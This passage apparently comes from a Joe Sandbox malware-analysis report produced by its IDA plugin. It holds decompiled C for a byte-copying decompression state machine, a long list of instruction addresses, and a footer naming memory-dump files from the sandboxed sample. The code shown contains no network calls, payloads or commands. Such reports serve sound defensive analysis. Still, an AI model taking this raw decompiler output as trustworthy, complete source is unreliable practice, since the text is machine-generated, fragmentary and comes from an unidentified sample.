													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                                                                                0x00000000
                                                                                                                0x004064ee
                                                                                                                0x004064ee
                                                                                                                0x004064f2
                                                                                                                0x004064ff
                                                                                                                0x00406509
                                                                                                                0x00000000
                                                                                                                0x004064f4
                                                                                                                0x004064f4
                                                                                                                0x0040652f
                                                                                                                0x00406532
                                                                                                                0x00406535
                                                                                                                0x00406538
                                                                                                                0x00406538
                                                                                                                0x0040653b
                                                                                                                0x00406542
                                                                                                                0x00406547
                                                                                                                0x00406428
                                                                                                                0x0040642b
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x004067a0
                                                                                                                0x004067a0
                                                                                                                0x004067a0
                                                                                                                0x004067a6
                                                                                                                0x004067ac
                                                                                                                0x004067b2
                                                                                                                0x004067cc
                                                                                                                0x004067cf
                                                                                                                0x004067d5
                                                                                                                0x004067e0
                                                                                                                0x004067e2
                                                                                                                0x004067b4
                                                                                                                0x004067b4
                                                                                                                0x004067c3
                                                                                                                0x004067c7
                                                                                                                0x004067c7
                                                                                                                0x004067ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004067ee
                                                                                                                0x004067f2
                                                                                                                0x004069a1
                                                                                                                0x004069b7
                                                                                                                0x004069bf
                                                                                                                0x004069c6
                                                                                                                0x004069c8
                                                                                                                0x004069cf
                                                                                                                0x004069d3
                                                                                                                0x004069d3
                                                                                                                0x004067fe
                                                                                                                0x00406805
                                                                                                                0x0040680d
                                                                                                                0x00406810
                                                                                                                0x00406813
                                                                                                                0x00406813
                                                                                                                0x00406819
                                                                                                                0x00406819
                                                                                                                0x00405fb5
                                                                                                                0x00405fb5
                                                                                                                0x00405fb5
                                                                                                                0x00405fbe
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fc4
                                                                                                                0x00000000
                                                                                                                0x00405fcf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fd8
                                                                                                                0x00405fdb
                                                                                                                0x00405fde
                                                                                                                0x00405fe2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fe8
                                                                                                                0x00405feb
                                                                                                                0x00405fed
                                                                                                                0x00405fee
                                                                                                                0x00405ff1
                                                                                                                0x00405ff3
                                                                                                                0x00405ff4
                                                                                                                0x00405ff6
                                                                                                                0x00405ff9
                                                                                                                0x00405ffe
                                                                                                                0x00406003
                                                                                                                0x0040600c
                                                                                                                0x0040601f
                                                                                                                0x00406022
                                                                                                                0x0040602e
                                                                                                                0x00406056
                                                                                                                0x00406058
                                                                                                                0x00406066
                                                                                                                0x00406066
                                                                                                                0x0040606a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040605a
                                                                                                                0x0040605a
                                                                                                                0x0040605d
                                                                                                                0x0040605e
                                                                                                                0x0040605e
                                                                                                                0x00000000
                                                                                                                0x0040605a
                                                                                                                0x00406034
                                                                                                                0x00406039
                                                                                                                0x00406039
                                                                                                                0x00406042
                                                                                                                0x0040604a
                                                                                                                0x0040604d
                                                                                                                0x00000000
                                                                                                                0x00406053
                                                                                                                0x00406053
                                                                                                                0x00000000
                                                                                                                0x00406053
                                                                                                                0x00000000
                                                                                                                0x00406070
                                                                                                                0x00406070
                                                                                                                0x00406074
                                                                                                                0x00406920
                                                                                                                0x00000000
                                                                                                                0x00406920
                                                                                                                0x0040607d
                                                                                                                0x0040608d
                                                                                                                0x00406090
                                                                                                                0x00406093
                                                                                                                0x00406093
                                                                                                                0x00406093
                                                                                                                0x00406096
                                                                                                                0x0040609a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040609c
                                                                                                                0x004060a2
                                                                                                                0x004060cc
                                                                                                                0x004060d2
                                                                                                                0x004060d9
                                                                                                                0x00000000
                                                                                                                0x004060d9
                                                                                                                0x004060a8
                                                                                                                0x004060ab
                                                                                                                0x004060b0
                                                                                                                0x004060b0
                                                                                                                0x004060bb
                                                                                                                0x004060c3
                                                                                                                0x004060c6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040610b
                                                                                                                0x00406111
                                                                                                                0x00406114
                                                                                                                0x00406121
                                                                                                                0x00406129
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004060e0
                                                                                                                0x004060e0
                                                                                                                0x004060e4
                                                                                                                0x0040692f
                                                                                                                0x00000000
                                                                                                                0x0040692f
                                                                                                                0x004060f0
                                                                                                                0x004060fb
                                                                                                                0x004060fb
                                                                                                                0x004060fb
                                                                                                                0x004060fe
                                                                                                                0x00406101
                                                                                                                0x00406104
                                                                                                                0x00406109
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004067a0
                                                                                                                0x004067a0
                                                                                                                0x004067a6
                                                                                                                0x004067ac
                                                                                                                0x004067b2
                                                                                                                0x004067cc
                                                                                                                0x004067cf
                                                                                                                0x004067d5
                                                                                                                0x004067e0
                                                                                                                0x004067e2
                                                                                                                0x004067b4
                                                                                                                0x004067b4
                                                                                                                0x004067c3
                                                                                                                0x004067c7
                                                                                                                0x004067c7
                                                                                                                0x004067ec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406131
                                                                                                                0x00406133
                                                                                                                0x00406136
                                                                                                                0x004061a7
                                                                                                                0x004061aa
                                                                                                                0x004061ad
                                                                                                                0x004061b4
                                                                                                                0x004061be
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x00406138
                                                                                                                0x0040613c
                                                                                                                0x0040613f
                                                                                                                0x00406141
                                                                                                                0x00406144
                                                                                                                0x00406147
                                                                                                                0x00406149
                                                                                                                0x0040614c
                                                                                                                0x0040614e
                                                                                                                0x00406153
                                                                                                                0x00406156
                                                                                                                0x00406159
                                                                                                                0x0040615d
                                                                                                                0x00406164
                                                                                                                0x00406167
                                                                                                                0x0040616e
                                                                                                                0x00406172
                                                                                                                0x0040617a
                                                                                                                0x0040617a
                                                                                                                0x0040617a
                                                                                                                0x00406174
                                                                                                                0x00406174
                                                                                                                0x00406174
                                                                                                                0x00406169
                                                                                                                0x00406169
                                                                                                                0x00406169
                                                                                                                0x0040617e
                                                                                                                0x00406181
                                                                                                                0x0040619f
                                                                                                                0x004061a1
                                                                                                                0x00000000
                                                                                                                0x00406183
                                                                                                                0x00406183
                                                                                                                0x00406186
                                                                                                                0x00406189
                                                                                                                0x0040618c
                                                                                                                0x0040618e
                                                                                                                0x0040618e
                                                                                                                0x0040618e
                                                                                                                0x00406191
                                                                                                                0x00406194
                                                                                                                0x00406196
                                                                                                                0x00406197
                                                                                                                0x0040619a
                                                                                                                0x00000000
                                                                                                                0x0040619a
                                                                                                                0x00000000
                                                                                                                0x004063d0
                                                                                                                0x004063d4
                                                                                                                0x004063f2
                                                                                                                0x004063f5
                                                                                                                0x004063fc
                                                                                                                0x004063ff
                                                                                                                0x00406402
                                                                                                                0x00406405
                                                                                                                0x00406408
                                                                                                                0x0040640b
                                                                                                                0x0040640d
                                                                                                                0x00406414
                                                                                                                0x00406415
                                                                                                                0x00406417
                                                                                                                0x0040641a
                                                                                                                0x0040641d
                                                                                                                0x00406420
                                                                                                                0x00406420
                                                                                                                0x00406425
                                                                                                                0x00000000
                                                                                                                0x00406425
                                                                                                                0x004063d6
                                                                                                                0x004063d9
                                                                                                                0x004063dc
                                                                                                                0x004063e6
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x0040643a
                                                                                                                0x0040643e
                                                                                                                0x00406461
                                                                                                                0x00406464
                                                                                                                0x00406467
                                                                                                                0x00406471
                                                                                                                0x00406440
                                                                                                                0x00406440
                                                                                                                0x00406443
                                                                                                                0x00406446
                                                                                                                0x00406449
                                                                                                                0x00406456
                                                                                                                0x00406459
                                                                                                                0x00406459
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x0040647d
                                                                                                                0x00406481
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406487
                                                                                                                0x0040648b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406491
                                                                                                                0x00406493
                                                                                                                0x00406497
                                                                                                                0x00406497
                                                                                                                0x0040649a
                                                                                                                0x0040649e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406515
                                                                                                                0x00406519
                                                                                                                0x00406520
                                                                                                                0x00406523
                                                                                                                0x00406526
                                                                                                                0x0040651b
                                                                                                                0x0040651b
                                                                                                                0x0040651b
                                                                                                                0x00406529
                                                                                                                0x0040652c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004065d5
                                                                                                                0x004065d5
                                                                                                                0x004065d9
                                                                                                                0x00406977
                                                                                                                0x00000000
                                                                                                                0x00406977
                                                                                                                0x004065df
                                                                                                                0x004065e2
                                                                                                                0x004065e5
                                                                                                                0x004065e9
                                                                                                                0x004065ec
                                                                                                                0x004065f2
                                                                                                                0x004065f4
                                                                                                                0x004065f4
                                                                                                                0x004065f4
                                                                                                                0x004065f7
                                                                                                                0x004065fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004061ca
                                                                                                                0x004061ca
                                                                                                                0x004061ce
                                                                                                                0x0040693b
                                                                                                                0x00000000
                                                                                                                0x0040693b
                                                                                                                0x004061d4
                                                                                                                0x004061d7
                                                                                                                0x004061da
                                                                                                                0x004061de
                                                                                                                0x004061e1
                                                                                                                0x004061e7
                                                                                                                0x004061e9
                                                                                                                0x004061e9
                                                                                                                0x004061e9
                                                                                                                0x004061ec
                                                                                                                0x004061ef
                                                                                                                0x004061ef
                                                                                                                0x004061f2
                                                                                                                0x004061f5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004061fb
                                                                                                                0x00406201
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406207
                                                                                                                0x00406207
                                                                                                                0x0040620b
                                                                                                                0x0040620e
                                                                                                                0x00406211
                                                                                                                0x00406214
                                                                                                                0x00406217
                                                                                                                0x00406218
                                                                                                                0x0040621b
                                                                                                                0x0040621d
                                                                                                                0x00406223
                                                                                                                0x00406226
                                                                                                                0x00406229
                                                                                                                0x0040622c
                                                                                                                0x0040622f
                                                                                                                0x00406232
                                                                                                                0x00406235
                                                                                                                0x00406251
                                                                                                                0x00406254
                                                                                                                0x00406257
                                                                                                                0x0040625a
                                                                                                                0x00406261
                                                                                                                0x00406265
                                                                                                                0x00406267
                                                                                                                0x0040626b
                                                                                                                0x00406237
                                                                                                                0x00406237
                                                                                                                0x0040623b
                                                                                                                0x00406243
                                                                                                                0x00406248
                                                                                                                0x0040624a
                                                                                                                0x0040624c
                                                                                                                0x0040624c
                                                                                                                0x0040626e
                                                                                                                0x00406275
                                                                                                                0x00406278
                                                                                                                0x00000000
                                                                                                                0x0040627e
                                                                                                                0x00000000
                                                                                                                0x0040627e
                                                                                                                0x00000000
                                                                                                                0x00406283
                                                                                                                0x00406283
                                                                                                                0x00406287
                                                                                                                0x00406947
                                                                                                                0x00000000
                                                                                                                0x00406947
                                                                                                                0x0040628d
                                                                                                                0x00406290
                                                                                                                0x00406293
                                                                                                                0x00406297
                                                                                                                0x0040629a
                                                                                                                0x004062a0
                                                                                                                0x004062a2
                                                                                                                0x004062a2
                                                                                                                0x004062a2
                                                                                                                0x004062a5
                                                                                                                0x004062a8
                                                                                                                0x004062a8
                                                                                                                0x004062a8
                                                                                                                0x004062ae
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004062b0
                                                                                                                0x004062b3
                                                                                                                0x004062b6
                                                                                                                0x004062b9
                                                                                                                0x004062bc
                                                                                                                0x004062bf
                                                                                                                0x004062c2
                                                                                                                0x004062c5
                                                                                                                0x004062c8
                                                                                                                0x004062cb
                                                                                                                0x004062ce
                                                                                                                0x004062e6
                                                                                                                0x004062e9
                                                                                                                0x004062ec
                                                                                                                0x004062ef
                                                                                                                0x004062ef
                                                                                                                0x004062f2
                                                                                                                0x004062f6
                                                                                                                0x004062f8
                                                                                                                0x004062d0
                                                                                                                0x004062d0
                                                                                                                0x004062d8
                                                                                                                0x004062dd
                                                                                                                0x004062df
                                                                                                                0x004062e1
                                                                                                                0x004062e1
                                                                                                                0x004062fb
                                                                                                                0x00406302
                                                                                                                0x00406305
                                                                                                                0x00000000
                                                                                                                0x00406307
                                                                                                                0x00000000
                                                                                                                0x00406307
                                                                                                                0x00406305
                                                                                                                0x0040630c
                                                                                                                0x0040630c
                                                                                                                0x0040630c
                                                                                                                0x0040630c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406347
                                                                                                                0x00406347
                                                                                                                0x0040634b
                                                                                                                0x00406953
                                                                                                                0x00000000
                                                                                                                0x00406953
                                                                                                                0x00406351
                                                                                                                0x00406354
                                                                                                                0x00406357
                                                                                                                0x0040635b
                                                                                                                0x0040635e
                                                                                                                0x00406364
                                                                                                                0x00406366
                                                                                                                0x00406366
                                                                                                                0x00406366
                                                                                                                0x00406369
                                                                                                                0x0040636c
                                                                                                                0x0040636c
                                                                                                                0x00406372
                                                                                                                0x00406310
                                                                                                                0x00406310
                                                                                                                0x00406313
                                                                                                                0x00000000
                                                                                                                0x00406313
                                                                                                                0x00406374
                                                                                                                0x00406374
                                                                                                                0x00406377
                                                                                                                0x0040637a
                                                                                                                0x0040637d
                                                                                                                0x00406380
                                                                                                                0x00406383
                                                                                                                0x00406386
                                                                                                                0x00406389
                                                                                                                0x0040638c
                                                                                                                0x0040638f
                                                                                                                0x00406392
                                                                                                                0x004063aa
                                                                                                                0x004063ad
                                                                                                                0x004063b0
                                                                                                                0x004063b3
                                                                                                                0x004063b3
                                                                                                                0x004063b6
                                                                                                                0x004063ba
                                                                                                                0x004063bc
                                                                                                                0x00406394
                                                                                                                0x00406394
                                                                                                                0x0040639c
                                                                                                                0x004063a1
                                                                                                                0x004063a3
                                                                                                                0x004063a5
                                                                                                                0x004063a5
                                                                                                                0x004063bf
                                                                                                                0x004063c6
                                                                                                                0x004063c9
                                                                                                                0x00000000
                                                                                                                0x004063cb
                                                                                                                0x00000000
                                                                                                                0x004063cb
                                                                                                                0x00000000
                                                                                                                0x00406658
                                                                                                                0x00406658
                                                                                                                0x0040665c
                                                                                                                0x00406983
                                                                                                                0x00000000
                                                                                                                0x00406983
                                                                                                                0x00406662
                                                                                                                0x00406665
                                                                                                                0x00406668
                                                                                                                0x0040666c
                                                                                                                0x0040666f
                                                                                                                0x00406675
                                                                                                                0x00406677
                                                                                                                0x00406677
                                                                                                                0x00406677
                                                                                                                0x0040667a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406767
                                                                                                                0x0040676b
                                                                                                                0x0040678d
                                                                                                                0x00406790
                                                                                                                0x0040679a
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x0040679d
                                                                                                                0x0040679d
                                                                                                                0x0040676d
                                                                                                                0x00406770
                                                                                                                0x00406774
                                                                                                                0x00406777
                                                                                                                0x00406777
                                                                                                                0x0040677a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406824
                                                                                                                0x00406828
                                                                                                                0x00406846
                                                                                                                0x00406846
                                                                                                                0x00406846
                                                                                                                0x0040684d
                                                                                                                0x00406854
                                                                                                                0x0040685b
                                                                                                                0x0040685b
                                                                                                                0x00000000
                                                                                                                0x0040685b
                                                                                                                0x0040682a
                                                                                                                0x0040682d
                                                                                                                0x00406830
                                                                                                                0x00406833
                                                                                                                0x0040683a
                                                                                                                0x0040677e
                                                                                                                0x0040677e
                                                                                                                0x00406781
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406915
                                                                                                                0x00406918
                                                                                                                0x00406819
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040654f
                                                                                                                0x00406551
                                                                                                                0x00406558
                                                                                                                0x00406559
                                                                                                                0x0040655b
                                                                                                                0x0040655e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406566
                                                                                                                0x00406569
                                                                                                                0x0040656c
                                                                                                                0x0040656e
                                                                                                                0x00406570
                                                                                                                0x00406570
                                                                                                                0x00406571
                                                                                                                0x00406574
                                                                                                                0x0040657b
                                                                                                                0x0040657e
                                                                                                                0x0040658c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406862
                                                                                                                0x00406862
                                                                                                                0x00406865
                                                                                                                0x0040686c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406871
                                                                                                                0x00406871
                                                                                                                0x00406875
                                                                                                                0x004069ad
                                                                                                                0x00000000
                                                                                                                0x004069ad
                                                                                                                0x0040687b
                                                                                                                0x0040687e
                                                                                                                0x00406881
                                                                                                                0x00406885
                                                                                                                0x00406888
                                                                                                                0x0040688e
                                                                                                                0x00406890
                                                                                                                0x00406890
                                                                                                                0x00406890
                                                                                                                0x00406893
                                                                                                                0x00406896
                                                                                                                0x00406896
                                                                                                                0x00406896
                                                                                                                0x00406896
                                                                                                                0x00406899
                                                                                                                0x00406899
                                                                                                                0x0040689d
                                                                                                                0x004068fd
                                                                                                                0x00406900
                                                                                                                0x00406905
                                                                                                                0x00406906
                                                                                                                0x00406908
                                                                                                                0x0040690a
                                                                                                                0x0040690d
                                                                                                                0x00406819
                                                                                                                0x00406819
                                                                                                                0x00000000
                                                                                                                0x0040681f
                                                                                                                0x00406819
                                                                                                                0x0040689f
                                                                                                                0x004068a5
                                                                                                                0x004068a8
                                                                                                                0x004068ab
                                                                                                                0x004068ae
                                                                                                                0x004068b1
                                                                                                                0x004068b4
                                                                                                                0x004068b7
                                                                                                                0x004068ba
                                                                                                                0x004068bd
                                                                                                                0x004068c0
                                                                                                                0x004068d9
                                                                                                                0x004068dc
                                                                                                                0x004068df
                                                                                                                0x004068e2
                                                                                                                0x004068e6
                                                                                                                0x004068e8
                                                                                                                0x004068e8
                                                                                                                0x004068e9
                                                                                                                0x004068ec
                                                                                                                0x004068c2
                                                                                                                0x004068c2
                                                                                                                0x004068ca
                                                                                                                0x004068cf
                                                                                                                0x004068d1
                                                                                                                0x004068d4
                                                                                                                0x004068d4
                                                                                                                0x004068ef
                                                                                                                0x004068f6
                                                                                                                0x00000000
                                                                                                                0x004068f8
                                                                                                                0x00000000
                                                                                                                0x004068f8
                                                                                                                0x00000000
                                                                                                                0x00406594
                                                                                                                0x00406597
                                                                                                                0x004065cd
                                                                                                                0x004066fd
                                                                                                                0x004066fd
                                                                                                                0x004066fd
                                                                                                                0x004066fd
                                                                                                                0x00406700
                                                                                                                0x00406700
                                                                                                                0x00406703
                                                                                                                0x00406705
                                                                                                                0x0040698f
                                                                                                                0x00000000
                                                                                                                0x0040698f
                                                                                                                0x0040670b
                                                                                                                0x0040670e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406714
                                                                                                                0x00406718
                                                                                                                0x0040671b
                                                                                                                0x0040671b
                                                                                                                0x0040671b
                                                                                                                0x00000000
                                                                                                                0x0040671b
                                                                                                                0x00406599
                                                                                                                0x0040659b
                                                                                                                0x0040659d
                                                                                                                0x0040659f
                                                                                                                0x004065a2
                                                                                                                0x004065a3
                                                                                                                0x004065a5
                                                                                                                0x004065a7
                                                                                                                0x004065aa
                                                                                                                0x004065ad
                                                                                                                0x004065c3
                                                                                                                0x004065c8
                                                                                                                0x00406600
                                                                                                                0x00406600
                                                                                                                0x00406604
                                                                                                                0x00406630
                                                                                                                0x00406632
                                                                                                                0x00406639
                                                                                                                0x0040663c
                                                                                                                0x0040663f
                                                                                                                0x0040663f
                                                                                                                0x00406644
                                                                                                                0x00406644
                                                                                                                0x00406646
                                                                                                                0x00406649
                                                                                                                0x00406650
                                                                                                                0x00406653
                                                                                                                0x00406680
                                                                                                                0x00406680
                                                                                                                0x00406683
                                                                                                                0x00406686
                                                                                                                0x004066fa
                                                                                                                0x004066fa
                                                                                                                0x004066fa
                                                                                                                0x00000000
                                                                                                                0x004066fa
                                                                                                                0x00406688
                                                                                                                0x0040668e
                                                                                                                0x00406691
                                                                                                                0x00406694
                                                                                                                0x00406697
                                                                                                                0x0040669a
                                                                                                                0x0040669d
                                                                                                                0x004066a0
                                                                                                                0x004066a3
                                                                                                                0x004066a6
                                                                                                                0x004066a9
                                                                                                                0x004066c2
                                                                                                                0x004066c4
                                                                                                                0x004066c7
                                                                                                                0x004066c8
                                                                                                                0x004066cb
                                                                                                                0x004066cd
                                                                                                                0x004066d0
                                                                                                                0x004066d2
                                                                                                                0x004066d4
                                                                                                                0x004066d7
                                                                                                                0x004066d9
                                                                                                                0x004066dc
                                                                                                                0x004066e0
                                                                                                                0x004066e2
                                                                                                                0x004066e2
                                                                                                                0x004066e3
                                                                                                                0x004066e6
                                                                                                                0x004066e9
                                                                                                                0x004066ab
                                                                                                                0x004066ab
                                                                                                                0x004066b3
                                                                                                                0x004066b8
                                                                                                                0x004066ba
                                                                                                                0x004066bd
                                                                                                                0x004066bd
                                                                                                                0x004066ec
                                                                                                                0x004066f3
                                                                                                                0x0040667d
                                                                                                                0x0040667d
                                                                                                                0x0040667d
                                                                                                                0x0040667d
                                                                                                                0x00000000
                                                                                                                0x004066f5
                                                                                                                0x00000000
                                                                                                                0x004066f5
                                                                                                                0x004066f3
                                                                                                                0x00406606
                                                                                                                0x00406609
                                                                                                                0x0040660b
                                                                                                                0x0040660e
                                                                                                                0x00406611
                                                                                                                0x00406614
                                                                                                                0x00406616
                                                                                                                0x00406619
                                                                                                                0x0040661c
                                                                                                                0x0040661c
                                                                                                                0x0040661f
                                                                                                                0x0040661f
                                                                                                                0x00406622
                                                                                                                0x00406629
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x004065fd
                                                                                                                0x00000000
                                                                                                                0x0040662b
                                                                                                                0x00000000
                                                                                                                0x0040662b
                                                                                                                0x00406629
                                                                                                                0x004065af
                                                                                                                0x004065b2
                                                                                                                0x004065b4
                                                                                                                0x004065b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406316
                                                                                                                0x00406316
                                                                                                                0x0040631a
                                                                                                                0x0040695f
                                                                                                                0x00000000
                                                                                                                0x0040695f
                                                                                                                0x00406320
                                                                                                                0x00406323
                                                                                                                0x00406326
                                                                                                                0x00406329
                                                                                                                0x0040632c
                                                                                                                0x0040632f
                                                                                                                0x00406332
                                                                                                                0x00406334
                                                                                                                0x00406337
                                                                                                                0x0040633a
                                                                                                                0x0040633d
                                                                                                                0x0040633f
                                                                                                                0x0040633f
                                                                                                                0x0040633f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004064a1
                                                                                                                0x004064a1
                                                                                                                0x004064a5
                                                                                                                0x0040696b
                                                                                                                0x00000000
                                                                                                                0x0040696b
                                                                                                                0x004064ab
                                                                                                                0x004064ae
                                                                                                                0x004064b1
                                                                                                                0x004064b4
                                                                                                                0x004064b6
                                                                                                                0x004064b6
                                                                                                                0x004064b6
                                                                                                                0x004064b9
                                                                                                                0x004064bc
                                                                                                                0x004064bf
                                                                                                                0x004064c2
                                                                                                                0x004064c5
                                                                                                                0x004064c8
                                                                                                                0x004064c9
                                                                                                                0x004064cb
                                                                                                                0x004064cb
                                                                                                                0x004064cb
                                                                                                                0x004064ce
                                                                                                                0x004064d1
                                                                                                                0x004064d4
                                                                                                                0x004064d7
                                                                                                                0x004064d7
                                                                                                                0x004064d7
                                                                                                                0x004064da
                                                                                                                0x004064dc
                                                                                                                0x004064dc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x0040671e
                                                                                                                0x00406722
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406728
                                                                                                                0x0040672b
                                                                                                                0x0040672e
                                                                                                                0x00406731
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406733
                                                                                                                0x00406736
                                                                                                                0x00406739
                                                                                                                0x0040673c
                                                                                                                0x0040673f
                                                                                                                0x00406742
                                                                                                                0x00406745
                                                                                                                0x00406746
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x00406748
                                                                                                                0x0040674b
                                                                                                                0x0040674e
                                                                                                                0x00406751
                                                                                                                0x00406754
                                                                                                                0x00406757
                                                                                                                0x0040675b
                                                                                                                0x0040675d
                                                                                                                0x00406760
                                                                                                                0x00000000
                                                                                                                0x00406762
                                                                                                                0x004064df
                                                                                                                0x004064df
                                                                                                                0x00000000
                                                                                                                0x004064df
                                                                                                                0x00406760
                                                                                                                0x00406995
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405fc4
                                                                                                                0x004069cc
                                                                                                                0x004069cc
                                                                                                                0x00000000
                                                                                                                0x004069cc
                                                                                                                0x00406819
                                                                                                                0x004067a0
                                                                                                                0x0040679d
                                                                                                                0x00000000
                                                                                                                0x004064f2

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
